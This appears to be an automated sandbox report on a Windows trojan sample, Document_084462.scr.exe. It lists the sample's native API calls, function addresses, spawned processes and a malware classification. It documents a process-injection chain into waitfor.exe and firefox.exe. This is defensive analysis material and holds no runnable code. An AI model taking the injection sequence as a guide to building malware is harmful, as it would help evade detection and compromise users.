            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2C50 NtUnmapViewOfSection,3_2_04AB2C50
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2DA0 NtReadVirtualMemory,3_2_04AB2DA0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2DC0 NtAdjustPrivilegesToken,3_2_04AB2DC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2D50 NtWriteVirtualMemory,3_2_04AB2D50
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2EB0 NtProtectVirtualMemory,3_2_04AB2EB0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2E80 NtCreateProcessEx,3_2_04AB2E80
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2EC0 NtQuerySection,3_2_04AB2EC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2ED0 NtResumeThread,3_2_04AB2ED0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2E00 NtQueueApcThread,3_2_04AB2E00
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2FB0 NtSetValueKey,3_2_04AB2FB0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2F30 NtOpenDirectoryObject,3_2_04AB2F30
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB29D0 NtWaitForSingleObject,3_2_04AB29D0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2AA0 NtQueryInformationFile,3_2_04AB2AA0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2BE0 NtQueryVirtualMemory,3_2_04AB2BE0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB2B20 NtQueryInformationProcess,3_2_04AB2B20
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB3C90 NtOpenThread,3_2_04AB3C90
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB3C30 NtOpenProcessToken,3_2_04AB3C30
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB38D0 NtGetContextThread,3_2_04AB38D0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_008E9A67 NtClose,3_2_008E9A67
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9F038 NtQueryInformationProcess,NtReadVirtualMemory,3_2_04D9F038
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04DA4668 NtMapViewOfSection,3_2_04DA4668
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04DA3618 NtSetContextThread,3_2_04DA3618
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04DA3C58 NtResumeThread,3_2_04DA3C58
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04DA3F78 NtQueueApcThread,3_2_04DA3F78
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9F9CB NtUnmapViewOfSection,3_2_04D9F9CB
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04DA3938 NtSuspendThread,3_2_04DA3938
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04DA4A31 NtUnmapViewOfSection,3_2_04DA4A31
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_700B1B5F0_2_700B1B5F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7F6F61_2_37B7F6F6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B336EC1_2_37B336EC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5D62C1_2_37B5D62C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6D6461_2_37B6D646
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B775C61_2_37B775C6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7F5C91_2_37B7F5C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B554901_2_37B55490
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2D4801_2_37B2D480
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB13801_2_37AB1380
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7F3301_2_37B7F330
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD2EC1_2_37AAD2EC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E01_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C01_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5D1301_2_37B5D130
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF1131_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B0717A1_2_37B0717A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF508C1_2_37AF508C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B770F11_2_37B770F1
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACB0D01_2_37ACB0D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B71FC61_2_37B71FC6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7FF631_2_37B7FF63
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3FF401_2_37B3FF40
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB21_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B79ED21_2_37B79ED2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5FDF41_2_37B5FDF4
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC9DD01_2_37AC9DD0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7FD271_2_37B7FD27
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B77D4C1_2_37B77D4C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B59C981_2_37B59C98
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADFCE01_2_37ADFCE0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B47CE81_2_37B47CE8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC3C601_2_37AC3C60
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B51B801_2_37B51B80
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7FB2E1_2_37B7FB2E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AFDB191_2_37AFDB19
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADFAA01_2_37ADFAA0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7FA891_2_37B7FA89
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37A899E81_2_37A899E8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B059C01_2_37B059C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B398B21_2_37B398B2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B778F31_2_37B778F3
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B718DA1_2_37B718DA
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC38001_2_37AC3800
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B358701_2_37B35870
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7F8721_2_37B7F872
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC98701_2_37AC9870
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB8701_2_37ADB870
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACA7601_2_37ACA760
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC27601_2_37AC2760
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B767571_2_37B76757
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC06801_2_37AC0680
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABC6E01_2_37ABC6E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7A6C01_2_37B7A6C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADC6001_2_37ADC600
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE46701_2_37AE4670
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8A5261_2_37B8A526
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC04451_2_37AC0445
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACE3101_2_37ACE310
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37A822451_2_37A82245
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8010E1_2_37B8010E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB00A01_2_37AB00A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6E0761_2_37B6E076
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7EFBF1_2_37B7EFBF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC6FE01_2_37AC6FE0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACCF001_2_37ACCF00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B70EAD1_2_37B70EAD
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB2EE81_2_37AB2EE8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B60E6D1_2_37B60E6D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B02E481_2_37B02E48
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE0E501_2_37AE0E50
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD2DB01_2_37AD2DB0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABAD001_2_37ABAD00
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC0D691_2_37AC0D69
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8ACEB1_2_37B8ACEB
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD8CDF1_2_37AD8CDF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACAC201_2_37ACAC20
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3EC201_2_37B3EC20
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB0C121_2_37AB0C12
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7EC601_2_37B7EC60
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B76C691_2_37B76C69
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6EC4C1_2_37B6EC4C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B34BC01_2_37B34BC0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC0B101_2_37AC0B10
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7CA131_2_37B7CA13
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7EA5B1_2_37B7EA5B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABE9A01_2_37ABE9A0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7E9A61_2_37B7E9A6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD68821_2_37AD6882
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC28C01_2_37AC28C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B608351_2_37B60835
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEE8101_2_37AEE810
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA68681_2_37AA6868
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012E3541_2_0012E354
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012E4751_2_0012E475
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012E80C1_2_0012E80C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_0012D8D81_2_0012D8D8
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F13542_2_034F1354
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F14752_2_034F1475
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F180C2_2_034F180C
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 2_2_034F08D82_2_034F08D8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A804453_2_04A80445
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B4A5263_2_04B4A526
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A806803_2_04A80680
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A7C6E03_2_04A7C6E0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3A6C03_2_04B3A6C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9C6003_2_04A9C600
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AA46703_2_04AA4670
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8A7603_2_04A8A760
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A827603_2_04A82760
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B367573_2_04B36757
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A700A03_2_04A700A0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B2E0763_2_04B2E076
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B4010E3_2_04B4010E
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8E3103_2_04A8E310
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B4ACEB3_2_04B4ACEB
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A98CDF3_2_04A98CDF
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8AC203_2_04A8AC20
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AFEC203_2_04AFEC20
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A70C123_2_04A70C12
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3EC603_2_04B3EC60
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B36C693_2_04B36C69
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B2EC4C3_2_04B2EC4C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A92DB03_2_04A92DB0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A7AD003_2_04A7AD00
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A80D693_2_04A80D69
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B30EAD3_2_04B30EAD
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A72EE83_2_04A72EE8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B20E6D3_2_04B20E6D
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AC2E483_2_04AC2E48
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AA0E503_2_04AA0E50
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3EFBF3_2_04B3EFBF
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A86FE03_2_04A86FE0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8CF003_2_04A8CF00
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A968823_2_04A96882
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1C89F3_2_04B1C89F
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A828C03_2_04A828C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B208353_2_04B20835
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AAE8103_2_04AAE810
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A668683_2_04A66868
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A7E9A03_2_04A7E9A0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3E9A63_2_04B3E9A6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B22AC03_2_04B22AC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3CA133_2_04B3CA13
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3EA5B3_2_04B3EA5B
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF4BC03_2_04AF4BC0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A80B103_2_04A80B10
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B154903_2_04B15490
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AED4803_2_04AED480
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B375C63_2_04B375C6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F5C93_2_04B3F5C9
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF36EC3_2_04AF36EC
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F6F63_2_04B3F6F6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B216233_2_04B21623
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1D62C3_2_04B1D62C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B2D6463_2_04B2D646
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AB508C3_2_04AB508C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B370F13_2_04B370F1
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A8B0D03_2_04A8B0D0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9B1E03_2_04A9B1E0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A851C03_2_04A851C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1D1303_2_04B1D130
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A6F1133_2_04A6F113
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AC717A3_2_04AC717A
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A6D2EC3_2_04A6D2EC
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3124C3_2_04B3124C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A713803_2_04A71380
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F3303_2_04B3F330
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B19C983_2_04B19C98
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9FCE03_2_04A9FCE0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B07CE83_2_04B07CE8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A83C603_2_04A83C60
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B1FDF43_2_04B1FDF4
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A89DD03_2_04A89DD0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FD273_2_04B3FD27
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B37D4C3_2_04B37D4C
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A81EB23_2_04A81EB2
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B39ED23_2_04B39ED2
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B23FA03_2_04B23FA0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B31FC63_2_04B31FC6
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FF633_2_04B3FF63
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AFFF403_2_04AFFF40
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF98B23_2_04AF98B2
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B378F33_2_04B378F3
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B318DA3_2_04B318DA
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A838003_2_04A83800
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3F8723_2_04B3F872
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A898703_2_04A89870
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9B8703_2_04A9B870
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AF58703_2_04AF5870
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04AC59C03_2_04AC59C0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04A9FAA03_2_04A9FAA0
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FA893_2_04B3FA89
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B11B803_2_04B11B80
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04B3FB2E3_2_04B3FB2E
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04ABDB193_2_04ABDB19
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9F0383_2_04D9F038
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9E4753_2_04D9E475
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9E3543_2_04D9E354
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9D8D83_2_04D9D8D8
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: 3_2_04D9E80C3_2_04D9E80C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: String function: 37B2E692 appears 86 times
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: String function: 37AF5050 appears 57 times
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: String function: 37B3EF10 appears 105 times
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: String function: 37AAB910 appears 275 times
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: String function: 37B07BE4 appears 100 times
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04AB5050 appears 58 times
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04AEE692 appears 86 times
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04AFEF10 appears 105 times
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04A6B910 appears 275 times
            Source: C:\Windows\SysWOW64\waitfor.exeCode function: String function: 04AC7BE4 appears 102 times
            Source: Document_084462.scr.exe, 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Document_084462.scr.exe
            Source: Document_084462.scr.exe, 00000001.00000002.13294981161.000000000776D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewaitfor.exej% vs Document_084462.scr.exe
            Source: Document_084462.scr.exe, 00000001.00000003.13193869050.0000000037A02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Document_084462.scr.exe
            Source: Document_084462.scr.exe, 00000001.00000003.13190425343.0000000037848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Document_084462.scr.exe
            Source: Document_084462.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@19/15
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_00404835 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404835
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 0_2_004021A2 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021A2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspiresJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsuE262.tmpJump to behavior
            Source: Document_084462.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Document_084462.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Document_084462.scr.exeReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\Document_084462.scr.exeFile read: C:\Users\user\Desktop\Document_084462.scr.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Document_084462.scr.exe "C:\Users\user\Desktop\Document_084462.scr.exe"
            Source: C:\Users\user\Desktop\Document_084462.scr.exeProcess created: C:\Users\user\Desktop\Document_084462.scr.exe "C:\Users\user\Desktop\Document_084462.scr.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\waitfor.exe "C:\Windows\SysWOW64\waitfor.exe"
            Source: C:\Windows\SysWOW64\waitfor.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Document_084462.scr.exeProcess created: C:\Users\user\Desktop\Document_084462.scr.exe "C:\Users\user\Desktop\Document_084462.scr.exe"Jump to behavior
